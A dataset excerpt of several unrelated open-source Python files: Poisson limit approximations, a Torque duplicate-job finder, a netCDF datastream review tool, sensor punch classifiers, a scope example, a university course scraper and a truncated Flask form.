text stringlengths 0 1.05M | meta dict |
|---|---|
# Approximations to Poisson upper and lower limits
# presently only for 1-sigma confidence limits
# from Gehrels 1986.
# Could extend to general CI using Ebeling 2003/4 (astro-ph/0301285),
# which builds from Gehrels 1986.
import numpy as N
def upper_limit_1_sigma(n):
return (n+1.0)*(1.0 - 1.0/(9.0*(n+1.0)) + 1.0/(3.0*N.sqrt(n+1.0)))**3
def lower_limit_1_sigma(n):
return n*(1.0 - 1.0/(9.0*n) - 1.0/(3.0*N.sqrt(n)))**3
# def ebeling_upper_limit(n, S):
# bi = N.array([)
# c01 = 0.50688
# c02 = 2.27532
# c1i = N.array([...])
# c2i = N.array([...])
# c3i = N.array([...])
# c4i = N.array([...])
# b = 0.0
# for i in range(8):
# b += bi[i] * S**i
# c = 0.0
# if S <= S01:
# for i in range(4):
# c += c1i[i] * (1.0/(S-S01))**i
# if S > S01 and S <= 1.2:
# for i in range(4):
# c += c2i[i] * (N.log10(S-S01))**i
# if S > 1.2 and S <= S02:
# for i in range(3):
# c += c3i[i] * (1.0/(S-S02))**i
# if S > S02:
# for i in range(7):
# c += c4i[i] * (N.log10(S-S02))**i
# return (n+1)*(1 - 1/(9*(n+1)) + S/(3*sqrt(n+1)) + b*(n+1)**c)**3
| {
"repo_name": "bamford/astrobamf",
"path": "poisson.py",
"copies": "1",
"size": "1134",
"license": "mit",
"hash": 2309365434581297000,
"line_mean": 28.0769230769,
"line_max": 77,
"alpha_frac": 0.4920634921,
"autogenerated": false,
"ratio": 2.032258064516129,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3024321556616129,
"avg_score": null,
"num_lines": null
} |
#!/apps/admin/tools.x86_64/python/2.7.3/bin/python
# Takes a path to a file, opens the file, parses the data into chunks, looks for duplicates, and prints those to a file.
#
#
#
import os
import sys
import sets
import argparse
from glob import glob
ap = argparse.ArgumentParser()
ap.add_argument("--files","-f",dest="files",nargs='+',action="store",required=False,help="Use the accounting records in these files",
default = glob('/var/spool/torque/server_priv/accounting/*'))
ap.add_argument("--output","-o",dest="output",nargs='+',action="store",required=False,help="Output file location",
default = glob('/tmp/duplicate_job_ids.txt'))
args=ap.parse_args()
#Parse input files. Borrowed from Derek's qhistory script
def parse_files(filenames, debug):
texts=[]
for fname in filenames:
f = open(fname,'r')
texts.append(f.read())
f.close
return texts
#Function to clear output files and ensure they can be written to
def clear_output(filenames, debug):
for fname in filenames:
clearfile = open(fname,'w')
clearfile.write(" ")
clearfile.close()
return clearfile
#Declare variables and set static information
list_of_files = set()
pre_split_line=" "
list_of_logs=" "
try:
path_to_file=str(args.files)
except:
print "Invalid path for accounting data."
print args.files
exit(0)
#capture the output of parse_files() and then capture the output of the split strings.
text_of_file="".join(parse_files(args.files, 0))
split_file_text=text_of_file.split(" ")
#Step through each line that was split previously and find the string ";S;". If found, store the line of text split on the ; delimiter. Merge into a single string with new lines.
for line in split_file_text:
if (line.find(";S;") != -1 ):
line_text=line.split(";")
pre_split_line+="\n" + str(line_text[2])
#Split the text into a list using the splitlines() string function.
textlist=pre_split_line.splitlines()
#Clear file and make sure it can be written to
try:
file_location=clear_output(args.output, 0)
except:
print "No output file given"
exit(0)
try:
output=open(str(args.output),'a')
except:
print "Could not open " + str(args.output) + " for appending"
#Step through the list and count repeat occurances. If the number of occurances is > 1 write the line to a file.
for line in textlist:
count = textlist.count(line)
if (count > 1):
output.write(line + " \n")
print args.output
output.close()
| {
"repo_name": "ixela/torque-duplicate-jobs",
"path": "find_duplicate_jobs.py",
"copies": "1",
"size": "2493",
"license": "mit",
"hash": -788278667127020700,
"line_mean": 30.5569620253,
"line_max": 178,
"alpha_frac": 0.6915363016,
"autogenerated": false,
"ratio": 3.3918367346938774,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.45833730362938774,
"avg_score": null,
"num_lines": null
} |
#!/apps/base/python3/bin/python3
'''Command line interface to the datastream and datastreamdiff review modules.
Provides a command line interface to the functionality inside of the
datastream and datastreamdiff modules, which writes the resulting json string
to the user's ncreview_web directory.
'''
import os
import re
import csv
import sys
import time
import json
import errno
import argparse
import datetime as dt
import ncr.utils as utils
from ncr.datastream import Datastream
from ncr.datastreamdiff import DatastreamDiff
import pdb
### Progress Bar ------------------------------------------------------------------------------------------------------
class ProgressBar:
'''Reports progress of loading datastreams, and estimates time remaining.
'''
def __init__(self, total_size, progress_bar_width=50):
'''Initialize a progress bar
Parameters:
total_size total number of files to process
progress_bar_width Character width of the progress bar
'''
# progress bar variables
self.progress_bar_width = 50 # width of the progress bar in characters
self.processed_size = 0
self.total_size = total_size
self.start_time = time.clock()
def start(self):
'''Save time when this method is called, and print a timeline at 0% progress.
'''
self.start_time = time.clock()
sys.stdout.write('\r['+(' '*self.progress_bar_width)+']0%')
def update(self, file_size):
'''Increment the number of files processed by one, and update the progress bar accordingly
'''
## update the progress bar
self.processed_size += file_size
time_elapsed = time.clock() - self.start_time
total_time = time_elapsed * self.total_size / self.processed_size
time_remain = (total_time - time_elapsed)*1.1 # overestimate by 10%
mins_remain = int(time_remain // 60)
secs_remain = int(time_remain % 60)
progress = self.processed_size / self.total_size
sys.stdout.write('\r[{0}{1}]{2}% ~{3}:{4} left '.format(
'#'*int(self.progress_bar_width*progress),
' '*int(self.progress_bar_width*(1-progress)),
int(progress*100),
mins_remain,
"%02d" % secs_remain)
)
sys.stdout.flush()
def complete(self):
'''Display a progress bar at 100%
'''
print('\r['+('#'*self.progress_bar_width)+']100%'+' '*15)
### Parse Args --------------------------------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Review reprocessing between two directories, or summari',
epilog='Note that if --begin and --end are unspecified when comparing datastreams, '+ \
'the time span chosen will be the intersection of the time periods spanned by both datastreams.')
parser.add_argument('old_dir', help='Old datastream directory')
parser.add_argument('new_dir', nargs='?', default=None,
help='New datastream directory, exclude to simply review a single directory.')
parser.add_argument('--begin', '-b', default='00010101', metavar='YYYYMMDD', help='Ignore files before YYYYMMDD')
parser.add_argument('--end', '-e', default='99991231', metavar='YYYYMMDD', help='Ignore files after YYYYMMDD')
parser.add_argument('--sample_interval', '-t', default=None,
help='Time interval to average data over in HH-MM-SS. If not provided, '+\
'defaults to 1 day if more than 10 days are being processed, otherwise defaults to hourly samples')
parser.add_argument('--metadata_only', '-m', action='store_true', default=False,
help='Review only metadata, ignoring variable data. Much faster than standard review.')
parser.add_argument('--write_dir', '-w', default=None, metavar='DIR', help='write output data files to specified directory')
parser.add_argument('--name', '-n', default=None,
help='Specify custom name to be used for the run. Will be the directory name where the '+\
'summary files ncreview creates are stored as well as the URL suffix.')
# convert time arguments
args = parser.parse_args()
# get absolute directory paths,
# this will be important for the webpage to know where the datastreams came from
args.old_dir = os.path.abspath(args.old_dir)
if args.new_dir: args.new_dir = os.path.abspath(args.new_dir)
if args.write_dir:
args.write_dir = os.path.abspath(args.write_dir)
if not os.path.exists(os.path.dirname(args.write_dir)):
sys.stderr.write("Error: write directory %s does not exist\n"%os.path.dirname(args.write_dir))
quit()
args.begin = dt.datetime.strptime(args.begin, '%Y%m%d')
args.end = dt.datetime.strptime(args.end, '%Y%m%d')
try:
if args.sample_interval is not None:
h, m, s = args.sample_interval.split('-')
args.sample_interval = int(h)*60*60+int(m)*60+int(s)
except:
sys.stderr.write("Error: chunk time %s is invalid.\n"%args.sample_interval)
quit()
### Review Data -------------------------------------------------------------------------------------------------------
def is_valid(fname):
t = utils.file_time(fname)
return t is not None and args.begin <= t <= args.end
args.new_dir = os.path.abspath(args.new_dir) if args.new_dir else args.new_dir
args.old_dir = os.path.abspath(args.old_dir) if args.old_dir else args.old_dir
jdata = None
if args.new_dir:
new_files = sorted(filter(is_valid, os.listdir(args.new_dir)))
old_files = sorted(filter(is_valid, os.listdir(args.old_dir)))
if not new_files:
raise RuntimeError(args.new_dir+' contains no netCDF files in the specified time period.')
if not old_files:
raise RuntimeError(args.old_dir+' contains no netCDF files in the specified time period.')
# get the latest begin and earliest end
sys.stdout.write('Determining comparison interval...')
new_times = list(map(utils.file_time, new_files))
old_times = list(map(utils.file_time, old_files))
args.begin = max(min(new_times), min(old_times)).replace(hour=0, minute=0, second=0, microsecond=0)
args.end = min(max(new_times), max(old_times)).replace(hour=23, minute=59, second=59, microsecond=999)
# re-filter the files with the new time bounds
new_files = sorted(filter(is_valid, new_files))
old_files = sorted(filter(is_valid, old_files))
if not new_files or not old_files:
raise RuntimeError('Old and New directories do not appear to have overlapping measurement '+ \
'times in the specified time period. Cannot determine a comparison interval.')
sys.stdout.write('\r')
sys.stdout.write('Determining total file size...'+' '*10)
sys.stdout.flush()
total_size = 0
for f in old_files:
total_size += os.stat(args.old_dir+'/'+f).st_size
for f in new_files:
total_size += os.stat(args.new_dir+'/'+f).st_size
progress_bar = ProgressBar(total_size)
sys.stdout.write('\r')
# read datastreams
print('Loading datastreams...'+' '*10)
progress_bar.start()
old_ds = Datastream(args.old_dir, args.begin, args.end, args.sample_interval, args.metadata_only, progress_bar)
new_ds = Datastream(args.new_dir, args.begin, args.end, args.sample_interval, args.metadata_only, progress_bar)
progress_bar.complete()
# compare datastreams
print('Comparing datastreams...')
dsdiff = DatastreamDiff(old_ds, new_ds)
jdata = dsdiff.jsonify()
else:
path = args.old_dir
files = sorted(filter(is_valid, os.listdir(path)))
if not files:
raise RuntimeError(path+' contains no netCDF files in the specified time period.')
sys.stdout.write('Determining total file size...'+' '*10)
sys.stdout.flush()
total_size = 0
for f in files:
total_size += os.stat(path+'/'+f).st_size
progress_bar = ProgressBar(total_size)
sys.stdout.write('\r')
# read datastreams
print('Loading datastream...'+' '*10)
progress_bar.start()
ds = Datastream(path, args.begin, args.end, args.sample_interval, args.metadata_only, progress_bar)
progress_bar.complete()
jdata = ds.jsonify()
### Write out the data ------------------------------------------------------------------------------------------------
def unique_name(format_str, path):
'''Produce a unique directory name at the specified path'''
ID = 1
while os.path.exists(path+'/'+format_str.format(ID)): ID += 1
return format_str.format(ID)
# get the path of the dir to write to
wpath = '/data/tmp/ncreview/'
if args.write_dir is not None:
wpath = args.write_dir
if not os.path.exists(wpath):
os.mkdir(wpath)
format_str = ''
if args.name:
format_str = args.name
if os.path.exists(wpath+'/'+args.name):
format_str += '.{0}' # if the directory already exists, add a unique id
elif args.write_dir:
format_str = '.ncr.'+dt.datetime.now().strftime('%y%m%d.%H%M%S')
if os.path.exists(format_str):
format_str += '.{0}' # if the directory already exists, add a unique id
else:
format_str = '%s.%s.{0}'%(os.environ['USER'], os.environ['HOST'])
jdata_dir = unique_name(format_str, wpath)
jdata_path = wpath+'/'+jdata_dir+'/'
os.mkdir(jdata_path)
n = 1
def separate_data(obj):
global n
to_separate = []
if obj['type'] in ['plot', 'timeline', 'fileTimeline', 'timelineDiff']:
to_separate = ['data']
elif obj['type'] in ['plotDiff', 'fileTimelineDiff']:
to_separate = ['old_data', 'new_data']
for key in to_separate:
# generate a unique csv file name
while os.path.isfile(jdata_path+'ncreview.{0}.csv'.format(n)): n += 1
# write out the data as csv
with open(jdata_path+'ncreview.{0}.csv'.format(n), 'w', newline='') as csvfile:
writer = csv.writer(csvfile, quoting=csv.QUOTE_NONNUMERIC)
for row in obj[key]: writer.writerow(row)
# make what was the data a reference to the file
obj[key] = n
if 'contents' in obj:
for c in obj['contents']:
separate_data(c)
separate_data(jdata)
# Write out the results as json
with open(jdata_path+'ncreview.json', 'w') as jfile:
jfile.write(json.dumps(jdata, default=utils.JEncoder))
first_dir, user, *_ = os.path.realpath(__file__).split('/')[1:]
location = '/~'+user+'/dsutil' if first_dir == 'home' else ''
url_string = jdata_dir;
if args.write_dir: # if custom write location, put full path
url_string = jdata_path
print ("Complete!")
print ("report at")
print ('https://engineering.arm.gov'+location+'/ncreview/?'+url_string)
| {
"repo_name": "CesiumLifeJacket/overwatch",
"path": "dummy_project/ncreview.py",
"copies": "1",
"size": "10643",
"license": "mit",
"hash": 7615076391447453000,
"line_mean": 36.3438596491,
"line_max": 124,
"alpha_frac": 0.633843841,
"autogenerated": false,
"ratio": 3.595608108108108,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9702711858624677,
"avg_score": 0.005348018096686319,
"num_lines": 285
} |
# app/science.py
import os
import pandas as pd
import numpy as np
import random
import math
import itertools
from sklearn import svm
from flask import current_app
from app.data import db, query_to_list
from app.sensors.models import Experiment, Sensor
"""
Support vector machines (SVMs) are a set of supervised learning methods
used for classification, regression and outliers detection.
"""
_basedir = os.path.abspath(os.path.dirname(__file__))
UPLOADS = 'api/training'
UPLOAD_FOLDER = os.path.join(_basedir, UPLOADS)
"""
# LEGACY training data from phone
filename = '50_punches_labelled_pt1_pt2_combined.csv'
non_punch_filename = 'non_punch_pt1.csv'
non_punch_filename2 = 'non_punch_pt2.csv'
mix_filename = 'mix_labelled_pt1.csv'
"""
# NEW Training data from mbient
def to_setup():
filename = 'MBIENT_straightPunch_chris.csv'
filename2 = 'MBIENT_straightPunchtraining2_chris.csv'
filename3 = 'MBIENT_straightPunchtraining3_chris.csv'
filename4 = 'MBIENT_straightPunchtraining4_chris.csv'
non_punch_filename = 'MBIENT_trainingGeneralMovement.csv'
non_punch_filename2 = 'MBIENT_generalMotionTraining_chris.csv'
non_punch_filename3 = 'MBIENT_gmt3.csv'
hook_punch_filename = 'MBIENT_hookPunch_chris.csv'
hook_punch_filename2 = 'MBIENT_hookpunchTraining_chris.csv'
hook_punch_filename3 = 'MBIENT_hookpunchTraining2.csv'
TRAIN_DATA = UPLOAD_FOLDER + '/punch/' + filename
TRAIN_DATA4 = UPLOAD_FOLDER + '/punch/' + filename2
TRAIN_DATA5 = UPLOAD_FOLDER + '/punch/' + filename3
TRAIN_DATA10 = UPLOAD_FOLDER + '/punch/' + filename4
TRAIN_DATA6 = UPLOAD_FOLDER + '/punch/' + hook_punch_filename
TRAIN_DATA7 = UPLOAD_FOLDER + '/punch/' + hook_punch_filename2
TRAIN_DATA8 = UPLOAD_FOLDER + '/punch/' + hook_punch_filename3
TRAIN_DATA2 = UPLOAD_FOLDER + '/non_punch/' + non_punch_filename
TRAIN_DATA3 = UPLOAD_FOLDER + '/non_punch/' + non_punch_filename2
TRAIN_DATA9 = UPLOAD_FOLDER + '/non_punch/' + non_punch_filename3
# TEST_DATA = UPLOAD_FOLDER + '/labelled_test/' + mix_filename
def sql_to_pandas():
pass
def pandas_cleanup(df):
columns = []
df_clean = df[['ACCELEROMETER_X', 'ACCELEROMETER_Y', 'ACCELEROMETER_Z', 'timestamp', 'experiment_id', 'Time_since_start']]
return df_clean
columns = ['ACCELEROMETER_X',
'ACCELEROMETER_Y',
'ACCELEROMETER_Z',
'GRAVITY_X',
'GRAVITY_Y',
'GRAVITY_Z',
'LINEAR_ACCELERATION_X',
'LINEAR_ACCELERATION_Y',
'LINEAR_ACCELERATION_Z',
'GYROSCOPE_X',
'GYROSCOPE_Y',
'GYROSCOPE_Z',
'MAGNETIC_FIELD_X',
'MAGNETIC_FIELD_Y',
'MAGNETIC_FIELD_Z',
'ORIENTATION_Z',
'ORIENTATION_X',
'ORIENTATION_Y',
'Time_since_start',
'timestamp',
'state']
# SHOULD REMOVE THE STATE COLUMN FOR NON TEST DATA
def clean_up(df):
clean_df = pd.DataFrame(df.index.tolist(), columns=['ACCELEROMETER_X', 'ACCELEROMETER_Y', 'ACCELEROMETER_Z'])
clean_df = clean_df.applymap(str)
clean_df = clean_df.apply(lambda s: s.str.replace('(', ''))
clean_df = clean_df.apply(lambda s: s.str.replace(')', ''))
clean_df = clean_df.reindex(columns=columns)
return clean_df
def set_straight_punch(the_df):
the_df['state'] = 1
punch_final_df = the_df
return punch_final_df
def set_non_punch(my_df):
my_df['state'] = 0
non_punch_final_df = my_df
return non_punch_final_df
def set_hook_punch(hook_df):
hook_df['state'] = 2
hook_punch_final_df = hook_df
return hook_punch_final_df
def more_setup():
df_punch = pd.read_csv(TRAIN_DATA, skiprows=[0], names=['initial'])
df_punch = clean_up(df_punch)
df_punch = set_straight_punch(df_punch)
df_punch2 = pd.read_csv(TRAIN_DATA4, skiprows=[0], names=['initial'])
df_punch2 = clean_up(df_punch2)
df_punch2 = set_straight_punch(df_punch2)
df_punch3 = pd.read_csv(TRAIN_DATA5, skiprows=[0], names=['initial'])
df_punch3 = clean_up(df_punch3)
df_punch3 = set_straight_punch(df_punch3)
df_punch4 = pd.read_csv(TRAIN_DATA10, skiprows=[0], names=['initial'])
df_punch4 = clean_up(df_punch4)
df_punch4 = set_straight_punch(df_punch4)
df_hook_punch = pd.read_csv(TRAIN_DATA6, skiprows=[0], names=['initial'])
df_hook_punch = clean_up(df_hook_punch)
df_hook_punch = set_hook_punch(df_hook_punch)
df_hook_punch2 = pd.read_csv(TRAIN_DATA7, skiprows=[0], names=['initial'])
df_hook_punch2 = clean_up(df_hook_punch2)
df_hook_punch2 = set_hook_punch(df_hook_punch2)
df_hook_punch3 = pd.read_csv(TRAIN_DATA8, skiprows=[0], names=['initial'])
df_hook_punch3 = clean_up(df_hook_punch3)
df_hook_punch3 = set_hook_punch(df_hook_punch3)
df_non_punch2 = pd.read_csv(TRAIN_DATA2, skiprows=[0], names=['initial'])
df_non_punch2 = clean_up(df_non_punch2)
df_non_punch2 = set_non_punch(df_non_punch2)
df_non_punch3 = pd.read_csv(TRAIN_DATA9, skiprows=[0], names=['initial'])
df_non_punch3 = clean_up(df_non_punch3)
df_non_punch3 = set_non_punch(df_non_punch3)
df_non_punch = pd.read_csv(TRAIN_DATA3, skiprows=[0], names=['initial'])
df_non_punch = clean_up(df_non_punch)
df_non_punch = set_non_punch(df_non_punch)
df_train = pd.concat([df_punch, df_punch2, df_punch3, df_punch4, df_hook_punch, df_hook_punch2, df_hook_punch3, df_non_punch2, df_non_punch3, df_non_punch], ignore_index=True)
# df_test = pd.read_csv(TEST_DATA, skiprows=[0], names=columns)
def my_svm(id):
"""
As other classifiers, SVC, NuSVC and LinearSVC take as input two arrays:
an array X of size [n_samples, n_features] holding the training samples,
and an array y of class labels (strings or integers), size [n_samples]:
"""
#=============================
#TRAINING - TODO: MOVE THIS!!!
#=============================
x1 = df_train['ACCELEROMETER_X'].values
x2 = df_train['ACCELEROMETER_Y'].values
x3 = df_train['ACCELEROMETER_Z'].values
y = df_train['state'].values
X = np.column_stack([x1, x2, x3])
clf = svm.SVC()
clf.fit(X, y)
#=============================
# RUN DATA AGAINST THE MODEL
#=============================
# Load the pandas dataframe from the DB using the experiment id
pandas_id = id
current_app.logger.debug('Preparing to make prediction for experiment: {}'.format(pandas_id))
query = db.session.query(Sensor).filter(Sensor.experiment_id == pandas_id)
df = pd.read_sql_query(query.statement, query.session.bind)
_x1 = df['ACCELEROMETER_X'].values
_x2 = df['ACCELEROMETER_Y'].values
_x3 = df['ACCELEROMETER_Z'].values
_X = np.column_stack([_x1, _x2, _x3])
my_prediction = clf.predict(_X)
prediction_df = pd.DataFrame(my_prediction, columns=['prediction'])
prediction_df = prediction_df.replace(to_replace="1", value="straight punch") # 1 = straight punch
prediction_df = prediction_df.replace(to_replace=2, value="hook punch") # 2 = hook punch
prediction_df = prediction_df.replace(to_replace=0, value="other") # to check, why is 0 not a string?
df['prediction'] = prediction_df['prediction']
current_app.logger.debug('DF length is: {}, which should match the number of predictions: {}'.format(len(df), len(prediction_df)))
prediction_input2 = df.values.tolist()
for obj, new_value in itertools.izip(query, prediction_input2):
obj.prediction = new_value[22] # 22nd column is the prediction
db.session.add(obj)
db.session.commit()
return 'prediction made'
def check_sequence(dataframe, index_value):
is_punch = []
punch = ('straight punch','hook punch')
prev_value = index_value - 1
n_2 = index_value - 2
n_3 = index_value - 3
n_4 = index_value - 4
next_value = index_value + 1
n2 = index_value + 2
n3 = index_value + 3
n4 = index_value + 4
n5 = index_value + 5
n6 = index_value + 6
n7 = index_value + 7
n8 = index_value + 8
n9 = index_value + 9
n10 = index_value + 10
forward_chain = [next_value, n2, n3, n4, n5, n6, n7, n8, n9, n10]
back_chain = [prev_value, n_2, n_3, n_4]
for f_value in forward_chain:
if (dataframe[f_value] not in punch):
is_punch.append(True)
else:
is_punch.append(False)
for b_value in back_chain:
if (dataframe[b_value] in punch):
is_punch.append(True)
else:
is_punch.append(False)
if False in is_punch:
return False
else:
print 'punch detected for: {}'.format(index_value)
return True
def count_calculator(df):
"""
takes the ML predictions and attempts to distinguish individual
motions (in this case punches) from the patterns therein
"""
print type(df)
print len(df)
counter = 0
# ========================================================
# Look for a sequence of 3 straight punches in a row to
# signify the beginning of a single punch
# ========================================================
try:
sp_values = df[df == 'straight punch'].index
print 'number of straight punch values {}'.format(len(sp_values))
# This gets us the index of the first straight punch value
first_value = df[df == 'straight punch'].index[0]
print first_value
except Exception as e:
current_app.logger.debug('Error calculating punch numbers: {}'.format(e))
counter = 0
# loop through all the indices of punches
for value in sp_values:
tick = check_sequence(df, value)
if tick == True:
counter += 1
return counter
| {
"repo_name": "ChristopherGS/sensor_readings",
"path": "app/science2.py",
"copies": "1",
"size": "9830",
"license": "bsd-3-clause",
"hash": 16390232753508896,
"line_mean": 31.8762541806,
"line_max": 179,
"alpha_frac": 0.6232960326,
"autogenerated": false,
"ratio": 3.012565124118909,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.41358611567189085,
"avg_score": null,
"num_lines": null
} |
# app/science.py
import os
import pandas as pd
import numpy as np
import random
import math
from sklearn import svm
"""
Support vector machines (SVMs) are a set of supervised learning methods
used for classification, regression and outliers detection.
"""
_basedir = os.path.abspath(os.path.dirname(__file__))
UPLOADS = 'api/uploads'
UPLOAD_FOLDER = os.path.join(_basedir, UPLOADS)
#dated
#filename = 'badboy_combined.csv'
#unlabelled_filename = 'badboy_unlabelled2.csv'
#PLAY_DATA = UPLOAD_FOLDER + '/' + filename
#PLAY_DATA2 = UPLOAD_FOLDER + '/' + unlabelled_filename
#df = pd.read_csv(PLAY_DATA)
#df_unlabelled = pd.read_csv(PLAY_DATA2)
#print df
def sql_to_pandas():
pass
def pandas_cleanup(df):
columns = []
df_clean = df[['accelerometer_x', 'accelerometer_y', 'accelerometer_z', 'timestamp', 'experiment_id']]
return df_clean
#class HMM:
# def __init__(self):
# pass
def my_hmm():
"""
Probability of being in a particular state at step i is known once we know
what state we were in at step i-1
Probability of seeing a particular emission
at step i is known once we know what state we were in at step i.
a sequence of observable X variable is generated
by a sequence of internal hidden state Z.
"""
# linear dynamical system model needs to do the heavy lifting --> which can model the dynamics of a punch
# the HMM will act as a switching mechanism, so that each hidden state will represent a gesture
# but the gesture is learned by the linear dynamical system
# Question is how to connect the two together
# HACK - increase the components of the HMM...not sure
states = ('punch', 'other')
observations = ('accelerometer_x', 'accelerometer_y', 'accelerometer_z')
start_probability = {'punch': 0.4, 'other': 0.6}
transition_probability = {
'punch' : {'punch': 0.9, 'other': 0.1},
'other' : {'punch': 0.2, 'other': 0.8}
}
# ARBITRARY VALUES - need to train the model
emission_probability = {
'punch' : {'accelerometer_x': 0.5, 'accelerometer_y': 0.4, 'accelerometer_z': 0.1},
'other' : {'accelerometer_x': 0.1, 'accelerometer_y': 0.3, 'accelerometer_z': 0.6}
}
# QUESTION HOW DOES THIS WORK FOR CONTINUOUS SEQUENCES?
startprob = np.array([0.4, 0.6])
transition_matrix = np.array([[0.9, 0.1],
[0.2, 0.8]])
# need to understand the uncertainty of the observations
# by understanding which state are they from
# analysis of variance
# so the mean is the values of the clusters
# covariance (variance between two different random variables)
"""
The covariance of each component
covars = .5 * np.tile(np.identity(2), (4, 1, 1))
creates array of 4 2x2 matrices with 0.5 on the diagonals and zero on the off diagonals
4 links to the number of components
how to check means? and covars?
"""
# means --> (array, shape (n_components, n_features)) Mean parameters for each state.
# in this case 2 x 3
# means = ?
# covars = ?
# model = hmm.GuassianHMM(3, "full", startprob, transition_matrix)
# model.means = means
# model.covars = covars
# X, Z = model.sample(100) The observable vs. hidden state probabilities
# --------------------------------------------------
# TRAIN MODEL
"""
List of array-like observation sequences,
each of which has shape (n_i, n_features), where n_i is the length of the i_th observation.
"""
# COULD IT BE THAT I HAVE MISUNDERSTOOD THE TRAINING HERE?
x = df['accelerometer_x'].values
y = df['accelerometer_y'].values
z = df['accelerometer_z'].values
X = np.column_stack([x, y, z])
print X
print X.shape
thurs_model = Model( name="Punch-Other" )
# Emission probabilities
# looks for discrete distribution
punch = State( DiscreteDistribution({ 'walk': 0.1, 'shop': 0.4, 'clean': 0.5 }) )
other = State( DiscreteDistribution({ 'walk': 0.6, 'shop': 0.3, 'clean': 0.1 }) )
###############################################################################
# Run Gaussian HMM
print("fitting to HMM and decoding ...")
# n_components : Number of states.
#_covariance_type : string describing the type of covariance parameters to use.
# Must be one of 'spherical', 'tied', 'diag', 'full'. Defaults to 'diag'.
model = GaussianHMM(n_components=2, covariance_type="diag").fit(X)
# predict the optimal sequence of internal hidden state
# Get the unlabelled data
_x = df_unlabelled['accelerometer_x'].values
_y = df_unlabelled['accelerometer_y'].values
_z = df_unlabelled['accelerometer_y'].values
Z = np.column_stack([_x, _y, _z])
# print Z
print Z.shape
hidden_states = model.predict(Z)
print("done\n")
####################################
print("means and vars of each hidden state")
for i in range(model.n_components):
print("%dth hidden state" % i)
print("mean = ", model.means_[i])
print("var = ", np.diag(model.covars_[i]))
print()
print hidden_states[1:50]
# 1 = punch
# 0 = other
#my_hmm()
| {
"repo_name": "ChristopherGS/sensor_readings",
"path": "app/science.py",
"copies": "1",
"size": "5247",
"license": "bsd-3-clause",
"hash": 2338509595643790300,
"line_mean": 25.3668341709,
"line_max": 109,
"alpha_frac": 0.6167333715,
"autogenerated": false,
"ratio": 3.4339005235602094,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9491166748240201,
"avg_score": 0.01189342936400181,
"num_lines": 199
} |
app_scope = scope.Scope()
app_scope['db_password'] = 'foobar'
app_scope['user'] = 'anon'
nested_user_scope = scope.Scope()
def handle_user():
current_scope = scope.get_current_scope()
# now inside a user session we might want
# to store some user data
current_scope['user'] = 'admin'
# and we still want to access the
# app data
assert current_scope.get('db_password') == 'foobar'
# we can change the db_password
current_scope['db_password'] = 'secret_admin_password'
# and all our data is as expected:
assert current_scope.get('db_password') == 'secret_admin_password'
assert current_scope.get('user') == 'admin'
def main():
with app_scope():
# we are inside "some app" that
# stores it "db_password" inside
# a scope
assert scope.get('db_password') == 'foobar'
with nested_user_scope():
handle_user()
# the app scope is untouched
assert scope.get('db_password') == 'foobar'
assert scope.get('user') == 'anon'
main() | {
"repo_name": "FlorianLudwig/scope",
"path": "doc/examples/nested.py",
"copies": "1",
"size": "1056",
"license": "apache-2.0",
"hash": -6705785039128514000,
"line_mean": 25.425,
"line_max": 70,
"alpha_frac": 0.6126893939,
"autogenerated": false,
"ratio": 3.6288659793814433,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4741555373281443,
"avg_score": null,
"num_lines": null
} |
# app/scraper.py
import json
import logging
import urllib2
from datetime import datetime
from bs4 import BeautifulSoup
# from ufc.models import Fighter, Opponent
# from models import University, Course
# import processor
UNIVERSITY_URL = 'http://www.york.ac.uk/study/undergraduate/courses/all?level=postgraduate&q='
APPLY_URL = 'https://www.york.ac.uk/admin/uao/ugrad/courses/cupid/index.cfm?ippCode=DRMCOMSSCI1&level=postgraduate'
class Scraper(object):
"""This class handles the pure scraping
of the data"""
def __init__(self, arg):
super(Scraper, self).__init__()
self.arg = arg
self.base_url = UNIVERSITY_URL
self.apply_url = APPLY_URL
def check_db_for_course(self, course_name):
if Fighter.objects.filter(fighter_name = fighter_name).exists():
return True
else:
return False
def get_questions(self, requirement):
#import pdb; pdb.set_trace()
questions = []
updated_url = str('https://www.york.ac.uk/admin/uao/ugrad/courses/cupid/index.cfm?ippCode=DRMCOMSSCI1&level=postgraduate')
print requirement
if requirement['uni'] == 'york':
updated_url = ('https://www.york.ac.uk/admin/uao/ugrad/courses/cupid/index.cfm?ippCode=DRMCOMSSCI1&level=postgraduate')
source = urllib2.urlopen(updated_url).read()
soup = BeautifulSoup(source)
forms = soup.find_all('label')
for question in forms:
print question.getText()
questions.append(question.getText())
return questions
elif requirement['uni'] == 'manchester':
updated_url = ('https://www.sheffield.ac.uk/postgradapplication/')
source = urllib2.urlopen(updated_url).read()
soup = BeautifulSoup(source)
forms = soup.find_all('label')
for question in forms:
print question.getText()
questions.append(question.getText())
return questions
else:
updated_url1 = str('https://www.york.ac.uk/admin/uao/ugrad/courses/cupid/index.cfm?ippCode=DRMCOMSSCI1&level=postgraduate')
updated_url2 = str('https://www.sheffield.ac.uk/postgradapplication/')
source1 = urllib2.urlopen(updated_url1).read()
source2 = urllib2.urlopen(updated_url2).read()
soup1 = BeautifulSoup(source1)
soup2 = BeautifulSoup(source2)
forms1 = soup1.find_all('label')
forms2 = soup2.find_all('label')
for question in forms1:
questions.append(question.getText())
for question in forms2:
questions.append(question.getText())
return questions | {
"repo_name": "ChristopherGS/1_app",
"path": "app/scraper.py",
"copies": "1",
"size": "2772",
"license": "bsd-3-clause",
"hash": 650274953189152600,
"line_mean": 36.9863013699,
"line_max": 135,
"alpha_frac": 0.6219336219,
"autogenerated": false,
"ratio": 3.681274900398406,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4803208522298406,
"avg_score": null,
"num_lines": null
} |
# app/seguimientos/forms.py
# coding: utf-8
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, HiddenField
from wtforms import DateField, SelectField
from wtforms.validators import DataRequired
from wtforms.widgets import TextArea
class SeguimientoForm(FlaskForm):
"""
Formulario para seguimientos
"""
id_miembro = HiddenField("idDir")
nomyape = StringField(u'Nombres y Apellidos Miembro:')
# Modelo Familia
